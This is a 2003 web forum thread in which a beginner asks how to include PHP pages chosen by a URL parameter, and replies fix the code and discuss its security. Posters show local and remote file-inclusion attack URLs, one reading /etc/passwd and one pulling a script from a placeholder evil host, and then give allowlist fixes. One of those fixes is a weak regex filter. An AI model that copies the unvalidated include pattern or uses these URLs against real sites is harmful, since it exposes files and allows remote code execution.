browolf Trusted SF Member
Joined: 19 Apr 2002 Posts: 1
|
Posted: Sat Apr 19, 2003 11:45 am Post subject: easy php question - dynamic includes? |
|
|
i'm trying to do dynamic includes. i've looked at the manual, and googled for dynamic includes but i'm just not finding anything helpful or that explains why it isn't working.
i got a webpage
http://127.0.0.1:96/sociare/index.php?page=whatis
and the code:
Code: |
<? include($page.".php") ?>
|
but i get the error
Warning: Failed opening '.php' for inclusion (include_path='.;c:\php4\pear') in d:\wwwroot\sociare\index.php on line 17
i think this means it isn't resolving $page. a non-dynamic include earlier on the page works.
i was trying to find some helpful stuff on google on how to get stuff off the url. maybe i'm using the wrong search terms. i couldn't find it in the manual either.
i was kind of educated guessing i could just do $page. i read a bit of a php book once
i'm sure this should be easy enough
cheers.
|
|
|
|
Battery Powered Just Arrived
Joined: 10 Apr 2003 Posts: 0
|
Posted: Sat Apr 19, 2003 3:31 pm Post subject: |
|
|
Your code is about right, the only two things i can see wrong are:
your starting statement doesn't have 'php' in it, and
you haven't used ';' at the end
eg should be:
Code: |
<?php include($page.".php"); ?> |
the first bit, not having the 'php' can still work as i'm aware, but a good habit to get into
(P.S - Your script isn't very secure at all, have you used any security measures anywhere else in the script?)
All the best,
B.P
|
|
|
|
ThePsyko SF Mod
Joined: 17 Oct 2002 Posts: 16777178 Location: California
|
Posted: Sat Apr 19, 2003 4:03 pm Post subject: |
|
|
Try
Code: |
<?php include( $_GET['page'] .".php" ) ?> |
Either that or enable Register Globals in the php.ini file... but it's better to get used to coding without it being enabled - otherwise if you move hosts or something, you run the risk of having to redo all your code
|
|
|
|
Battery Powered Just Arrived
Joined: 10 Apr 2003 Posts: 0
|
Posted: Sat Apr 19, 2003 4:11 pm Post subject: |
|
|
Just to elaborate on the security side of the script,
since there is no validation being done on $page, anyone could call the script like this (assuming register_globals is on):
index.php?page=/etc/passwd
When a non PHP file is include()'d it's displayed as HTML/Text so won't be parsed, but even worse include() allows for including remote files, imagine:
index.php?page=http://evilsite.com/evil_script.php
evil_script.php could be anything the malicious user wanted, all it would have to do is echo out some PHP code for your script to receive, and it would be run right out of your script
The solution is to validate the input, eg:
Code: |
// Allowed page names, without the ".php" extension that is appended below
$pages = array('whatis', 'whatisnt', 'what');
if( in_array($page, $pages) )
{
    include($page.".php");
}
else
{
    die("Nice Try!!!");
}
|
Or with ThePsyko's (better) way of doing it
Code: |
// Same allowlist check, reading the value from $_GET instead of a registered global
$pages = array('whatis', 'whatisnt', 'what');
if( isset($_GET['page']) && in_array($_GET['page'], $pages) )
{
    include( $_GET['page'] .".php" );
}
else
{
    die("Nice Try!!!");
}
|
From what you've posted already it's clear that you're on a Windows box, so the /etc/passwd example wouldn't directly apply for you but you get the gist, but if you're going to upload the script to your webserver (and it's on nix) the example should have made you shiver : ))
But without validation you're leaving any file open
All the best,
B.P
|
|
|
|
big tom Forum Fanatic
Joined: 28 May 2002 Posts: 16777215 Location: UK
|
Posted: Sat Apr 19, 2003 9:37 pm Post subject: |
|
|
or just
Code: |
<?php
$page .= ".php";
include($page);
?>
|
of course you don't want any cross server scripting going on, so add this in...
Code: |
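<?php
if (!$page) { $page = "start"; }
// eregi() was removed in PHP 7; preg_match() with the i modifier
// performs the same case-insensitive match
$patern = "#http://.+#i";
if (preg_match($patern, $page)) {
    $page = "start";
}
$page .= ".php";
include($page);
?>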
|
|
|
|
|
browolf Trusted SF Member
Joined: 19 Apr 2002 Posts: 1
|
Posted: Sun Apr 20, 2003 4:03 pm Post subject: |
|
|
still not working.
i simplified to
Code: |
$page.=".php";
echo "page: ". $page;
|
and i get page: .php
using
Code: |
<?php include( $_GET['page'] .".php" ) ?>
|
i get a strange error msg about T_INCLUDE
i was looking for my php.ini
i don't seem to have one on my c: drive. dunno how that happened.
could this be the reason?
can php work without a php.ini?
|
|
|
|
big tom Forum Fanatic
Joined: 28 May 2002 Posts: 16777215 Location: UK
|
Posted: Sun Apr 20, 2003 4:11 pm Post subject: |
|
|
try just
$page .= ".php";
echo "page: $page";
personally i don't see any need to use the dot to add the variable on the end.
|
|
|
|
browolf Trusted SF Member
Joined: 19 Apr 2002 Posts: 1
|
Posted: Thu May 01, 2003 5:32 pm Post subject: |
|
|
ThePsyko wrote: |
Try
Code: |
<?php include( $_GET['page'] .".php" ) ?> |
Either that or enable Register Globals in the php.ini file... but it's better to get used to coding without it being enabled - otherwise if you move hosts or something, you run the risk of having to redo all your code |
i got it working using this at work, once i'd figured out the 'php' in <?php was necessary. Guess i should reinstall php at home
cheers
|
|
|
|
Irenaeus Just Arrived
Joined: 15 Apr 2003 Posts: 0 Location: nottm/leeds, england
|
Posted: Thu May 01, 2003 5:43 pm Post subject: |
|
|
i used to use this, stops people wandering off...
Code: |
if($page){
    // strstr() takes the haystack first: reject any page name containing a dot
    if(strstr($page, '.')) {
        include('./404.php');
    }elseif(!file_exists('./' . $page . '.php')) {
        include('./404.php');
    }else {
        include('./' . $page . '.php');
    }
}
|
Last edited by Irenaeus on Sat Jul 09, 2005 1:27 am; edited 1 time in total |
|
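An allowlist-based version of the dynamic include discussed in this thread, as an added example that is not part of any post: the request value only selects a key from a fixed map and is never concatenated into the path. The page names come from the thread; `PAGES`, `resolve_page` and the temporary demo directory are hypothetical names, and the sample request values are constructed.

```php
<?php
// Added example, not code from the thread; function and constant names are hypothetical.

// Public page keys mapped to fixed file names. The request only selects a key.
const PAGES = array(
    'whatis'   => 'whatis.php',
    'whatisnt' => 'whatisnt.php',
    'what'     => 'what.php',
);

// Return the absolute path to include for a request value, or null to reject it.
function resolve_page($requested, $baseDir)
{
    // Rejects missing values, arrays (?page[]=x) and anything that is not an exact key.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    // The path is built from the allowlist value, never from the request itself.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // Defence in depth: the file must exist and sit directly inside the pages directory.
    if ($base === false || $path === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary pages directory that holds only whatis.php.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . uniqid();
mkdir($dir);
$demoFile = $dir . DIRECTORY_SEPARATOR . 'whatis.php';
file_put_contents($demoFile, 'what is');

// Constructed request values: one valid key, one allowlisted key whose file is
// missing, and several values that a bare include($page . ".php") would act on.
$samples = array('whatis', 'what', 'whatis.php', '../index', '/etc/passwd',
                 'http://example.invalid/x', array('whatis'), null);
foreach ($samples as $value) {
    $path = resolve_page($value, $dir);
    $shown = json_encode($value, JSON_UNESCAPED_SLASHES);
    echo str_pad($shown, 30), ' => ', $path === null ? 'rejected' : 'include ' . basename($path), "\n";
}

unlink($demoFile);
rmdir($dir);
```

In a front controller the result of `resolve_page()` would be passed to `include`, with a 404 page served when it returns null. Remote inclusion is additionally governed by the `allow_url_include` setting in php.ini (added in PHP 5.2, off by default).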
|
|
dyn0 Just Arrived
Joined: 21 Apr 2003 Posts: 0 Location: Leeds
|
Posted: Sun May 04, 2003 12:19 pm Post subject: |
|
|
Quote: |
<?php
$page .= ".php";
include($page);
?>
|
The above code (as far as i'm aware) is slightly insecure because you could do www.somesite.com/somepage.php?page=/etc/passwd and such.
|
|
|
|
browolf Trusted SF Member
Joined: 19 Apr 2002 Posts: 1
|
Posted: Sun May 04, 2003 6:14 pm Post subject: |
|
|
i'm running php on the abyss webserver from http://www.aprelium.com/ so there isn't an etc/password
i noticed the other day you can also run ASP using ActiveHTML from http://www.selisoft.com/en/ahtml/ which is free for personal use. i always thought the only other asp was chiliasp. but Sun seems to have bought that now.
|
|
|
|
|